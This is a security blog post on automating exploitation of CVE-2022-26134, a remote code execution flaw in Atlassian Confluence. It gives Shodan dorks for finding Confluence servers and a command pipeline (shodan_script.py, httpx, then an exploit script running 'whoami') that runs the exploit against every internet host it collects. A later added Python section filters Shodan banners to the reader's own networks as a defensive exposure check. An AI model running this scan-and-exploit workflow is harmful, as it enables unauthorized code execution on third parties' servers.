How I was able to find 150+ applications vulnerable to CVE-2022-26134 | A Zero-day RCE
Hey everyone, I'm abhishekmorla.
Let's not dive into the heart of this CVE; you can refer to this Medium blog for a detailed analysis of this zero-day: “CVE-2022-26134”
The main purpose of this blog is to show you how you can automate the process and save time.
Here is the link: “CVE-2022-26134 with shodan”
The first part of the repository collects all the IPs that match the dork you provide in the -d argument. You can use these Shodan dorks to find Atlassian Confluence applications:
http.component:"atlassian confluence"
http.favicon.hash:-305179312
http.title:"Log In — Confluence" 200
http.component:"atlassian confluence" http.title:"Log In — Confluence" 200
http.favicon.hash:-305179312 200
So, run the Shodan script to grab all the IPs:
python3 shodan_script.py -API xxxxxxx -L 10 -D "http.favicon.hash:-305179312 200" > log.txt
Now we will use httpx to get all the valid IPs:
cat log.txt | httpx -o forexploits.txt
Finally, run the exploit script against all the valid collected IPs:
python3 CVE-2022-26134.py forexploits.txt "whoami"
It will print the IP and command for vulnerable hosts.
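The same fingerprints can be turned around to check whether your own Confluence servers are visible to this kind of search. The following is an added example, not code from this post or its repository: it filters Shodan banner records (one JSON object per line) down to hosts inside networks you own that match the dorks above. The record layout (ip_str, port, http.title, http.favicon.hash, http.components), the function names and the sample records are assumptions made for illustration.

```python
import ipaddress
import json

# Fingerprints taken from the Shodan dorks listed in the post.
FAVICON_HASH = -305179312
COMPONENT = "atlassian confluence"

# Constructed sample records (documentation address ranges), one JSON banner per line.
# Assumed layout: ip_str, port, http.title, http.favicon.hash, http.components.
SAMPLE_BANNERS = [
    '{"ip_str": "203.0.113.10", "port": 8090, "http": {"title": "Log In - Confluence", '
    '"favicon": {"hash": -305179312}, "components": {"Atlassian Confluence": {}}}}',
    '{"ip_str": "198.51.100.7", "port": 443, "http": {"favicon": {"hash": -305179312}}}',
    '{"ip_str": "203.0.113.25", "port": 443, "http": {"title": "Welcome", "favicon": {"hash": 12345}}}',
    '{"ip_str": "203.0.113.40", "port": 80, "http": {"title": null, "favicon": {"hash": -305179312}}}',
    'not json',
]

def matched_fingerprints(banner):
    """Return which of the post's fingerprints a banner matches."""
    http = banner.get("http") or {}
    hits = []
    if (http.get("favicon") or {}).get("hash") == FAVICON_HASH:
        hits.append("favicon")
    title = http.get("title") or ""
    if title.startswith("Log In") and title.endswith("Confluence"):
        hits.append("title")
    if any(name.lower() == COMPONENT for name in (http.get("components") or {})):
        hits.append("component")
    return hits

def exposed_assets(banner_lines, own_networks):
    """List (ip, port, fingerprints) for matching banners inside our own networks."""
    nets = [ipaddress.ip_network(n) for n in own_networks]
    findings = []
    for line in banner_lines:
        try:
            banner = json.loads(line)
            ip = ipaddress.ip_address(banner["ip_str"])
        except (ValueError, KeyError, TypeError):
            continue  # skip malformed or incomplete records
        hits = matched_fingerprints(banner)
        if hits and any(ip in net for net in nets):
            findings.append((str(ip), banner.get("port"), hits))
    return findings

if __name__ == "__main__":
    for ip, port, hits in exposed_assets(SAMPLE_BANNERS, ["203.0.113.0/24"]):
        print(f"{ip}:{port} matches {', '.join(hits)}: Confluence visible from the internet")
```

Any host this reports is one that the collection step above would also pick up, so it belongs behind access restrictions and at the top of the patch queue.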
Video — https://youtu.be/mNBCMUNUn_U
Thanks for reading!
LinkedIn : https://www.linkedin.com/in/abhishekmorla/
twitter : https://twitter.com/abhishekmorla